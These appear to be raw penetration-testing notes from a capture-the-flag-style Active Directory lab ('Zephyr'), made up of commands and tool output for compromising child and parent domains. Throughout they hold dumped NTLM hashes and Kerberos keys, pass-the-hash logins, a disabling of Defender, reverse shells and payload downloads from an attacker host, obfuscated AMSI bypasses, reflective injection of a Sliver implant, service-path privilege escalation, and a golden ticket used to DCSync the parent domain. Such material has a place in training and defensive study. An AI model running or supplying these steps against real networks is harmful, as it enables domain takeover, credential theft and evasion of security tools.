internal.zsm.local\Emily:aes256-cts-hmac-sha1-96:6fac0f47c747960e583ab9cb6d93c31a9425f9a921d246766c2d1a798e10fb56
internal.zsm.local\Emily:aes128-cts-hmac-sha1-96:fbba2f446451e35dd9cbf1d376580e1f
internal.zsm.local\Emily:des-cbc-md5:fd374cc262ec9201
internal.zsm.local\Laura:aes256-cts-hmac-sha1-96:bf6a8feea25df8f1640143c2dc26bc76128748962aef3d5e1c315b8bc7acc8c0
internal.zsm.local\Laura:aes128-cts-hmac-sha1-96:b994efccf32f7827c5ec3a43126a1118
internal.zsm.local\Laura:des-cbc-md5:add68cc23470b0f8
internal.zsm.local\Melissa:aes256-cts-hmac-sha1-96:b09d86e2e6480c2122ee1383f24e592a9642e16470a82bdeb9fff6875d41a922
internal.zsm.local\Melissa:aes128-cts-hmac-sha1-96:289e6d2c65f84c94f185e9755708cf3b
internal.zsm.local\Melissa:des-cbc-md5:982a25f7dc4cb3e9
internal.zsm.local\Sarah:aes256-cts-hmac-sha1-96:81028d54164a46107a6f6b9b0ac9a9216aee0e8d4bce82a3c668d5e1f16774c5
internal.zsm.local\Sarah:aes128-cts-hmac-sha1-96:d130b796b81c66348bc67a95029a19c7
internal.zsm.local\Sarah:des-cbc-md5:29ceaeb664bc2f9e
internal.zsm.local\Amy:aes256-cts-hmac-sha1-96:940adf4174eaaa50218561b87644cdf0210cdecb40ee5b6672312ef39e7f4390
internal.zsm.local\Amy:aes128-cts-hmac-sha1-96:655645f7b62f9d073a00ef7142c8da33
internal.zsm.local\Amy:des-cbc-md5:49e0d6bfd69868b6
internal.zsm.local\Steven:aes256-cts-hmac-sha1-96:9adcb602c37ce0ee4894d74a6575a6f70f7430e8e00446bc0850b787089c4cc4
internal.zsm.local\Steven:aes128-cts-hmac-sha1-96:e9731b435a8651cf11d52d71df936385
internal.zsm.local\Steven:des-cbc-md5:5dce8a52b389e5a2
internal.zsm.local\Malcolm:aes256-cts-hmac-sha1-96:f6e7d8a35afb386c1c271d6a53af85fcf8e306d36f281fdfc2c477c353f62c91
internal.zsm.local\Malcolm:aes128-cts-hmac-sha1-96:4bac2835d8be32ad5dd585ceb7450ef3
internal.zsm.local\Malcolm:des-cbc-md5:26b331256d2fbcd9
internal.zsm.local\Aron:aes256-cts-hmac-sha1-96:957fd600878eaad5dba70443e42d6a647b0b393211da3e62e55ef5bff965d9bb
internal.zsm.local\Aron:aes128-cts-hmac-sha1-96:26ef49f42cb51e023b50c84e360399eb
internal.zsm.local\Aron:des-cbc-md5:91cef44fc119f119
internal.zsm.local\Matt:aes256-cts-hmac-sha1-96:1877cc1d57a84d334b4a07a77c80086dfb76abe997f0339307efb32429b0deee
internal.zsm.local\Matt:aes128-cts-hmac-sha1-96:a4007666551eebd71856c6833faed374
internal.zsm.local\Matt:des-cbc-md5:2a4a5b467f9bb919
internal.zsm.local\Jamie:aes256-cts-hmac-sha1-96:899a0a57d770ad6510608350b67487beb5c50ac8f3455a1804ff4e8eb85da5e8
internal.zsm.local\Jamie:aes128-cts-hmac-sha1-96:abc87732e5844aafab3c8b355076a959
internal.zsm.local\Jamie:des-cbc-md5:5234a7253bd31f98
smith:aes256-cts-hmac-sha1-96:732bb6606076fbd27885722b4c57d7280e3a972642c34c16bce66814bf64a3b0
smith:aes128-cts-hmac-sha1-96:05b77f34a4406c4029b932e17d62c158
smith:des-cbc-md5:ec2c29e03837b685
ZPH-SVRCDC01$:aes256-cts-hmac-sha1-96:8a67907987149e76179c1717526a984b286656ce9c5afae114b11a0e1187d282
ZPH-SVRCDC01$:aes128-cts-hmac-sha1-96:68e66ddb5aaf1e796af831a3a0527699
ZPH-SVRCDC01$:des-cbc-md5:298c2fb6f823790d
ZPH-SVRCHR$:aes256-cts-hmac-sha1-96:9b37dffd2f9e191262978b8a9cc9b41f782165e4f4709973c9e1e5ada5f80e35
ZPH-SVRCHR$:aes128-cts-hmac-sha1-96:cf8f357935397b6fcf7058e751ffd9e6
ZPH-SVRCHR$:des-cbc-md5:4698c19bbaf8b667
ZPH-SVRCSUP$:aes256-cts-hmac-sha1-96:980035e13beb4c1b68e5071f0b919bf1a11b37cf3573e0a88f0305614fb361d3
ZPH-SVRCSUP$:aes128-cts-hmac-sha1-96:a98bbab60af92f6b8ce9d1f93e9a230c
ZPH-SVRCSUP$:des-cbc-md5:ec7acd5d73fb371f
ZSM-SVRCSQL02$:aes256-cts-hmac-sha1-96:1270026132348b974c1a948cd7b202ae9678b5b3b03cdbdb4be825c1c11f4d71
ZSM-SVRCSQL02$:aes128-cts-hmac-sha1-96:5d3e1581bca6b36aac111bb16bc8e2e1
ZSM-SVRCSQL02$:des-cbc-md5:bf8faba8893475a7
INT-MAINT$:aes256-cts-hmac-sha1-96:7c6282803848f411d9f819642f917bd14a023f3fb66d803868e04faa00c1c859
INT-MAINT$:aes128-cts-hmac-sha1-96:34cc456699aa20c6a3d00433fa959455
INT-MAINT$:des-cbc-md5:aebc7f4368a29885
ZSM$:aes256-cts-hmac-sha1-96:6f9dd2e95b0d477790cf26718e75f022c5743b2aeb2b7b413dcf186eb6c4b290
ZSM$:aes128-cts-hmac-sha1-96:cdf76265a702f0db58aa1081ceadefce
ZSM$:des-cbc-md5:025b3d794357349e
[*] Cleaning up... 
 
psexec.py Administrator@192.168.210.16 -hashes aad3b435b51404eeaad3b435b51404ee:c5940ff73882a95b73bdebe63210911f
 
psexec.py Administrator@192.168.210.16 -hashes aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
 
wmiexec.py Administrator@192.168.210.16 -hashes aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
 
powershell -Command "& {Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus}"
\\10.10.14.4\share\SHALLOW_SPADE.exe
 
certutil -urlcache -split -f http://10.10.14.4:445/SHALLOW_SPADE.exe
 
SINGLE_SHARK.exe
 
sliver (SINGLE_SHARK) > cat flag.txt
 
ZEPHYR{In73rn4l_D0m41n_D0m1n473d} :The Fall
 

.17

crackmapexec winrm 192.168.210.17 -u 'aron' -p 'ToughPasswordToCrack123!' -d internal.zsm.local
 
evil-winrm -i 192.168.210.17 -u aron -p 'ToughPasswordToCrack123!'
upload nc64.exe
upload RunasCs.exe
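# Attacker listener; the callback below must target the same port (the original note had 5985 here,
# which did not match this listener — the .12 section further down uses 53 for both).
nc -lvvp 53
# On the target, from the evil-winrm session: RunasCs with logon type 3 and remote impersonation runs
# nc64.exe back to the attack box with a PowerShell shell.
./RunasCs.exe -l 3 aron ToughPasswordToCrack123! -d internal.zsm.local --remote-impersonation 'c:\users\aron\documents\nc64.exe 10.10.14.4 53 -e powershell.exe'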
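# AMSI bypass via reflection: set the private static AmsiUtils.amsiInitFailed flag so scanning is skipped
# for this process. Plain-text form (the original ran the three statements together on one line with no ';').
$test = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); $test212 = $test.GetField('amsiInitFailed', 'NonPublic,Static'); $test212.SetValue($null, $true)
# Same patch with the 'AmsiUtils' / 'amsiInitFailed' strings base64-encoded (UTF-16LE) so the literals do not
# appear in the command line — the plain form above is commonly signature-detected.
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
# Spawn a nested PowerShell runspace with ExecutionPolicy Bypass.
$psh = [PowerShell]::Create().AddCommand("powershell").AddParameter("ExecutionPolicy","Bypass").Invoke()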
 
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
 
iex(iwr http://10.10.14.4:53/PowerUp.ps1 -UseBasicParsing)
 
iex(iwr http://10.10.14.4:53/Bypass-UAC.ps1 -UseBasicParsing)
 
 
 
 
$psh = [PowerShell]::Create().AddCommand("powershell").AddParameter("ExecutionPolicy","Bypass").Invoke()

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)


iex(iwr http://10.10.14.4:53/Invoke-ReflectivePEInjection.ps1 -UseBasicParsing)


`$url = "http://10.10.14.4:53/SINGLE_SHARK.exe" 
$binary = (New-Object Net.WebClient).DownloadData($url)
Invoke-ReflectivePEInjection -PEBytes $binary`

iex(iwr http://10.10.14.4:53/large1.ps1 -UseBasicParsing)


powershell -ep bypass [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true);Import-Module ./PowerUp.ps1;Invoke-Allchecks

secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:06e402102d72956c62a63794a999935e internal.zsm.local/ZPH-SVRCHR\$@192.168.210.17
# Inspect the service first and record its original binPath from `qc` so it can be restored afterwards.
sc.exe qc wuauserv
sc.exe query wuauserv

# Service misconfiguration (surfaced by PowerUp above, presumably a writable service config): point the binary
# path at a command that adds aron to the local Administrators group; it runs under the service's account
# (LocalSystem for wuauserv by default) when the service starts.
# NOTE(review): sc.exe documents the form `binPath= "..."` with a space after '='; if this variant is rejected, use that one.
sc.exe config wuauserv binPath="net localgroup Administrators aron /add"

# Restart to trigger it. `start` typically reports an error because net.exe is not a real service binary,
# but the group change has already been applied by then.
sc.exe stop wuauserv
sc.exe start wuauserv

Exit the WinRM session and log back in so the new local Administrators membership is present in a fresh logon token (the existing session keeps its old group list).


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat flag.txt
ZEPHYR{S3rv1c3_M4n4g3m3nt_f41L5} :tweaked

PS C:\Users\Administrator> cd ..
PS C:\Users> Import-Module ActiveDirectory
PS C:\Users> $domain = Get-ADDomain
PS C:\Users> $domain.DomainSID

BinaryLength AccountDomainSid                         Value
------------ ----------------                         -----
          24 S-1-5-21-3056178012-3972705859-491075245 S-1-5-21-3056178012-3972705859-491075245

.12

crackmapexec winrm 192.168.210.12 -u 'jamie' -p 'Password123!'
 
 
evil-winrm -i 192.168.210.12 -u jamie -p 'Password123!'
 
 
 
upload nc64.exe
upload RunasCs.exe
nc -lvvp 53
./RunasCs.exe -l 3 jamie Password123! -d zsm.local --remote-impersonation 'c:\users\jamie\documents\nc64.exe 10.10.14.4 53 -e cmd.exe'
 
powershell
 
$psh = [PowerShell]::Create().AddCommand("powershell").AddParameter("ExecutionPolicy","Bypass").Invoke()
 
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
 
iex(iwr http://10.10.14.4:445/PowerUp.ps1 -UseBasicParsing)

.10 (SID enumeration; `-hashes` expects `LM:NT` — the commands below put the NT hash in both fields, which Impacket tolerates because only the NT half is used for NTLM auth, but `-hashes :543beb…` is the intended form)

└─$ lookupsid.py internal.zsm.local/Administrator@192.168.210.16 -hashes 543beb20a2a579c7714ced68a1760d5e:543beb20a2a579c7714ced68a1760d5e 
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra

[*] Brute forcing SIDs at 192.168.210.16
[*] StringBinding ncacn_np:192.168.210.16[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3056178012-3972705859-491075245
500: internal\Administrator (SidTypeUser)
501: internal\Guest (SidTypeUser)
502: internal\krbtgt (SidTypeUser)
512: internal\Domain Admins (SidTypeGroup)
513: internal\Domain Users (SidTypeGroup)
514: internal\Domain Guests (SidTypeGroup)
515: internal\Domain Computers (SidTypeGroup)
516: internal\Domain Controllers (SidTypeGroup)
517: internal\Cert Publishers (SidTypeAlias)
520: internal\Group Policy Creator Owners (SidTypeGroup)
521: internal\Read-only Domain Controllers (SidTypeGroup)
522: internal\Cloneable Domain Controllers (SidTypeGroup)
525: internal\Protected Users (SidTypeGroup)
526: internal\Key Admins (SidTypeGroup)
553: internal\RAS and IAS Servers (SidTypeAlias)
571: internal\Allowed RODC Password Replication Group (SidTypeAlias)
572: internal\Denied RODC Password Replication Group (SidTypeAlias)
1000: internal\ZPH-SVRCDC01$ (SidTypeUser)
1101: internal\DnsAdmins (SidTypeAlias)
1102: internal\DnsUpdateProxy (SidTypeGroup)
1103: internal\ZSM$ (SidTypeUser)
1601: internal\ZPH-SVRCHR$ (SidTypeUser)
1602: internal\ZPH-SVRCSUP$ (SidTypeUser)
                                                  
└─$ lookupsid.py internal.zsm.local/Administrator@192.168.210.10 -hashes 543beb20a2a579c7714ced68a1760d5e:543beb20a2a579c7714ced68a1760d5e
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra

[*] Brute forcing SIDs at 192.168.210.10
[*] StringBinding ncacn_np:192.168.210.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2734290894-461713716-141835440
498: ZSM\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: ZSM\Administrator (SidTypeUser)
501: ZSM\Guest (SidTypeUser)
502: ZSM\krbtgt (SidTypeUser)
512: ZSM\Domain Admins (SidTypeGroup)
513: ZSM\Domain Users (SidTypeGroup)
514: ZSM\Domain Guests (SidTypeGroup)
515: ZSM\Domain Computers (SidTypeGroup)
516: ZSM\Domain Controllers (SidTypeGroup)
517: ZSM\Cert Publishers (SidTypeAlias)
518: ZSM\Schema Admins (SidTypeGroup)
519: ZSM\Enterprise Admins (SidTypeGroup)
520: ZSM\Group Policy Creator Owners (SidTypeGroup)
521: ZSM\Read-only Domain Controllers (SidTypeGroup)
522: ZSM\Cloneable Domain Controllers (SidTypeGroup)
525: ZSM\Protected Users (SidTypeGroup)
526: ZSM\Key Admins (SidTypeGroup)
527: ZSM\Enterprise Key Admins (SidTypeGroup)
553: ZSM\RAS and IAS Servers (SidTypeAlias)
571: ZSM\Allowed RODC Password Replication Group (SidTypeAlias)
572: ZSM\Denied RODC Password Replication Group (SidTypeAlias)
1000: ZSM\ZPH-SVRDC01$ (SidTypeUser)
1101: ZSM\DnsAdmins (SidTypeAlias)
1102: ZSM\DnsUpdateProxy (SidTypeGroup)
1104: ZSM\MAINTENANCE$ (SidTypeUser)
1105: ZSM\ZPH-GMSA-ADFS$ (SidTypeUser)
1106: ZSM\ZPH-SVRCA01$ (SidTypeUser)
1107: ZSM\daniel.morris (SidTypeUser)
1108: ZSM\ZPH-SVRADFS1$ (SidTypeUser)
1109: ZSM\PAINTERS$ (SidTypeUser)
1110: ZSM\paul.williams (SidTypeUser)
1601: ZSM\ZPH-SVRSQL01$ (SidTypeUser)
1602: ZSM\internal$ (SidTypeUser)

secretsdump.py internal.zsm.local/Administrator@192.168.210.16 -hashes 543beb20a2a579c7714ced68a1760d5e:543beb20a2a579c7714ced68a1760d5e
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xb1223a009047a376c120c3630a0f0e48
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33efe43f0dc7e3b2435579aa53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
internal\ZPH-SVRCDC01$:aes256-cts-hmac-sha1-96:8a67907987149e76179c1717526a984b286656ce9c5afae114b11a0e1187d282
internal\ZPH-SVRCDC01$:aes128-cts-hmac-sha1-96:68e66ddb5aaf1e796af831a3a0527699
internal\ZPH-SVRCDC01$:des-cbc-md5:dc8c893b57c4e0ab
internal\ZPH-SVRCDC01$:plain_password_hex:dc66f30d3e8bd48b4bfb9c3f53eb66ebda1edbb7af476a9f7650476edce03326b61fabe212dfd9e6c2e06eaaffcab3c78cfd4f47cd564ef53e8eb5d855f9e998c34c5fabc5e713559e090d6e5dc149a97ed653608d5cd07864d7774f2d766512849d4fafff4030324173ccd8cb8c6a1513a348a337c6d46778e4e37bc2e2c2e369626f1f153bdf391f8c175fdae042537016a2198b8c120c738854c907a1ddddcb88aaa517af97bcee783d1d9a36ddc179f2bb5cc8a336a00863183c96384434bb9a8eee781822f51d2727cd14e3fd0841edfa7004eefa2a8e3327b457f34587642e1e91e79a24590d97b8ad6cb14ee7
internal\ZPH-SVRCDC01$:aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xf108ba9fcd3554a2abb82ff4a8d29f0679aeaae6
dpapi_userkey:0xe57f2322d588ce987f04d6a3b1bf31cfa35d050a
[*] NL$KM 
 0000   07 E9 F2 3F 08 49 46 07  02 CE 30 4B 65 D3 86 32   ...?.IF...0Ke..2
 0010   6F 02 5D 36 7D E8 30 33  F4 71 94 44 98 37 CB 1A   o.]6}.03.q.D.7..
 0020   05 CC 76 F1 26 E2 94 E7  D3 54 78 1F EF BE E9 13   ..v.&....Tx.....
 0030   30 3B 62 CB A5 57 75 E6  78 F3 D4 55 5C 68 20 15   0;b..Wu.x..U\h .
NL$KM:07e9f23f0849460702ce304b65d386326f025d367de83033f47194449837cb1a05cc76f126e294e7d354781fefbee913303b62cba55775e678f3d4555c682015
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::



krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0540fe51ddd618f42a66ef059ac36441:::




internal.zsm.local\mssql_svc:6101:aad3b435b51404eeaad3b435b51404ee:8cb21ab7f3ee6d782c724216bd88d1d1:::
internal.zsm.local\Emily:6601:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Laura:6602:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Melissa:6603:aad3b435b51404eeaad3b435b51404ee:184260f5bf16a77d67a9d540fda79495:::
internal.zsm.local\Sarah:6604:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Amy:6605:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Steven:6606:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Malcolm:6607:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Aron:6608:aad3b435b51404eeaad3b435b51404ee:8cb21ab7f3ee6d782c724216bd88d1d1:::
internal.zsm.local\Matt:6609:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Jamie:6610:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
ZPH-SVRCDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948:::
ZPH-SVRCHR$:1601:aad3b435b51404eeaad3b435b51404ee:06e402102d72956c62a63794a999935e:::
ZPH-SVRCSUP$:1602:aad3b435b51404eeaad3b435b51404ee:36e7d551e7cb15ca7dad3fd851fc707f:::
ZSM-SVRCSQL02$:5601:aad3b435b51404eeaad3b435b51404ee:ad854719bbb6fc1664316a14cc6eb88d:::
INT-MAINT$:6102:aad3b435b51404eeaad3b435b51404ee:8c0aff2e562402c147dc9650b1eb86cb:::
ZSM$:1103:aad3b435b51404eeaad3b435b51404ee:caa09fc109945e3a5f5237e4a94c2242:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:fbbb5e79da10a8b4609429942c12329391e4af7213e69560893b81c421375f0b
Administrator:aes128-cts-hmac-sha1-96:1f50b00b725eb4ed09a3def4e75ec9f0
Administrator:des-cbc-md5:439ed652fe5b38ae
krbtgt:aes256-cts-hmac-sha1-96:3bdcbeb0910e5887e6d6c7fbec6c3f29e1e099322ac91cc386ca296a5c5497b0
krbtgt:aes128-cts-hmac-sha1-96:b6252a6e5ec060751a03c1a73ef2af4e
krbtgt:des-cbc-md5:92755ef7ce8a6e16
internal.zsm.local\mssql_svc:aes256-cts-hmac-sha1-96:bea9de16d6775f6ed646cf8e002b2e6845e219f080a709410cb600f909d105ff
internal.zsm.local\mssql_svc:aes128-cts-hmac-sha1-96:4df91cf757b8cb7c5f6e544236293c8d
internal.zsm.local\mssql_svc:des-cbc-md5:5bdf199ee546e6f8
internal.zsm.local\Emily:aes256-cts-hmac-sha1-96:6fac0f47c747960e583ab9cb6d93c31a9425f9a921d246766c2d1a798e10fb56
internal.zsm.local\Emily:aes128-cts-hmac-sha1-96:fbba2f446451e35dd9cbf1d376580e1f
internal.zsm.local\Emily:des-cbc-md5:fd374cc262ec9201
internal.zsm.local\Laura:aes256-cts-hmac-sha1-96:bf6a8feea25df8f1640143c2dc26bc76128748962aef3d5e1c315b8bc7acc8c0
internal.zsm.local\Laura:aes128-cts-hmac-sha1-96:b994efccf32f7827c5ec3a43126a1118
internal.zsm.local\Laura:des-cbc-md5:add68cc23470b0f8
internal.zsm.local\Melissa:aes256-cts-hmac-sha1-96:b09d86e2e6480c2122ee1383f24e592a9642e16470a82bdeb9fff6875d41a922
internal.zsm.local\Melissa:aes128-cts-hmac-sha1-96:289e6d2c65f84c94f185e9755708cf3b
internal.zsm.local\Melissa:des-cbc-md5:982a25f7dc4cb3e9
internal.zsm.local\Sarah:aes256-cts-hmac-sha1-96:81028d54164a46107a6f6b9b0ac9a9216aee0e8d4bce82a3c668d5e1f16774c5
internal.zsm.local\Sarah:aes128-cts-hmac-sha1-96:d130b796b81c66348bc67a95029a19c7
internal.zsm.local\Sarah:des-cbc-md5:29ceaeb664bc2f9e
internal.zsm.local\Amy:aes256-cts-hmac-sha1-96:940adf4174eaaa50218561b87644cdf0210cdecb40ee5b6672312ef39e7f4390
internal.zsm.local\Amy:aes128-cts-hmac-sha1-96:655645f7b62f9d073a00ef7142c8da33
internal.zsm.local\Amy:des-cbc-md5:49e0d6bfd69868b6
internal.zsm.local\Steven:aes256-cts-hmac-sha1-96:9adcb602c37ce0ee4894d74a6575a6f70f7430e8e00446bc0850b787089c4cc4
internal.zsm.local\Steven:aes128-cts-hmac-sha1-96:e9731b435a8651cf11d52d71df936385
internal.zsm.local\Steven:des-cbc-md5:5dce8a52b389e5a2
internal.zsm.local\Malcolm:aes256-cts-hmac-sha1-96:f6e7d8a35afb386c1c271d6a53af85fcf8e306d36f281fdfc2c477c353f62c91
internal.zsm.local\Malcolm:aes128-cts-hmac-sha1-96:4bac2835d8be32ad5dd585ceb7450ef3
internal.zsm.local\Malcolm:des-cbc-md5:26b331256d2fbcd9
internal.zsm.local\Aron:aes256-cts-hmac-sha1-96:957fd600878eaad5dba70443e42d6a647b0b393211da3e62e55ef5bff965d9bb
internal.zsm.local\Aron:aes128-cts-hmac-sha1-96:26ef49f42cb51e023b50c84e360399eb
internal.zsm.local\Aron:des-cbc-md5:91cef44fc119f119
internal.zsm.local\Matt:aes256-cts-hmac-sha1-96:1877cc1d57a84d334b4a07a77c80086dfb76abe997f0339307efb32429b0deee
internal.zsm.local\Matt:aes128-cts-hmac-sha1-96:a4007666551eebd71856c6833faed374
internal.zsm.local\Matt:des-cbc-md5:2a4a5b467f9bb919
internal.zsm.local\Jamie:aes256-cts-hmac-sha1-96:899a0a57d770ad6510608350b67487beb5c50ac8f3455a1804ff4e8eb85da5e8
internal.zsm.local\Jamie:aes128-cts-hmac-sha1-96:abc87732e5844aafab3c8b355076a959
internal.zsm.local\Jamie:des-cbc-md5:5234a7253bd31f98
ZPH-SVRCDC01$:aes256-cts-hmac-sha1-96:8a67907987149e76179c1717526a984b286656ce9c5afae114b11a0e1187d282
ZPH-SVRCDC01$:aes128-cts-hmac-sha1-96:68e66ddb5aaf1e796af831a3a0527699
ZPH-SVRCDC01$:des-cbc-md5:298c2fb6f823790d
ZPH-SVRCHR$:aes256-cts-hmac-sha1-96:9b37dffd2f9e191262978b8a9cc9b41f782165e4f4709973c9e1e5ada5f80e35
ZPH-SVRCHR$:aes128-cts-hmac-sha1-96:cf8f357935397b6fcf7058e751ffd9e6
ZPH-SVRCHR$:des-cbc-md5:4698c19bbaf8b667
ZPH-SVRCSUP$:aes256-cts-hmac-sha1-96:980035e13beb4c1b68e5071f0b919bf1a11b37cf3573e0a88f0305614fb361d3
ZPH-SVRCSUP$:aes128-cts-hmac-sha1-96:a98bbab60af92f6b8ce9d1f93e9a230c
ZPH-SVRCSUP$:des-cbc-md5:ec7acd5d73fb371f
ZSM-SVRCSQL02$:aes256-cts-hmac-sha1-96:1270026132348b974c1a948cd7b202ae9678b5b3b03cdbdb4be825c1c11f4d71
ZSM-SVRCSQL02$:aes128-cts-hmac-sha1-96:5d3e1581bca6b36aac111bb16bc8e2e1
ZSM-SVRCSQL02$:des-cbc-md5:bf8faba8893475a7
INT-MAINT$:aes256-cts-hmac-sha1-96:7c6282803848f411d9f819642f917bd14a023f3fb66d803868e04faa00c1c859
INT-MAINT$:aes128-cts-hmac-sha1-96:34cc456699aa20c6a3d00433fa959455
INT-MAINT$:des-cbc-md5:aebc7f4368a29885
ZSM$:aes256-cts-hmac-sha1-96:d14c3a49f01db9d821a6df62b06dbd209fb39d7164ccf6b994a8fa2473e21e7f
ZSM$:aes128-cts-hmac-sha1-96:0b7cee6e01fd63e61057fac9e26ff52e
ZSM$:des-cbc-md5:7508dc292cbf16b5
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Child domain SID (internal.zsm.local): S-1-5-21-3056178012-3972705859-491075245
Parent domain SID (zsm.local): S-1-5-21-2734290894-461713716-141835440
Child domain krbtgt NT hash: 0540fe51ddd618f42a66ef059ac36441
# Golden ticket for the child domain, signed with the child krbtgt NT hash dumped above,
# with the parent's Enterprise Admins group (parent domain SID + RID 519) added as an
# ExtraSid. Intra-forest trusts do not SID-filter, so the ticket is honoured as Enterprise
# Admin by the parent DC. Ticket is written to Administrator.ccache.
ticketer.py -nthash 0540fe51ddd618f42a66ef059ac36441 -domain internal.zsm.local -domain-sid  S-1-5-21-3056178012-3972705859-491075245 -extra-sid S-1-5-21-2734290894-461713716-141835440-519 Administrator



Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for internal.zsm.local/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache
                                      
# Point Kerberos at the forged ticket and DCSync the parent DC with it (-k -no-pass).
# The target must be given by FQDN so the service ticket's SPN matches; -target-ip
# supplies the address since the FQDN may not resolve from the attacker box.
export KRB5CCNAME=Administrator.ccache

secretsdump.py internal.zsm.local/Administrator@ZPH-SVRDC01.zsm.local -k -no-pass -target-ip 192.168.210.10




Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::



ZSM\ZPH-SVRDC01$:aad3b435b51404eeaad3b435b51404ee:b02f38febbe88d3297f779bf41157502:::


[*] Using the DRSUAPI method to get NTDS.DIT secrets

Administrator:500:aad3b435b51404eeaad3b435b51404ee:84210eddc5724a7801fe78289ee94d44:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8a72936717997f33694d17bd2ce909fe:::
zsm.local\daniel.morris:1107:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
zsm.local\paul.williams:1110:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
zsm.local\marcus:4102:aad3b435b51404eeaad3b435b51404ee:3b24c391862f4a8531a245a0217708c4:::
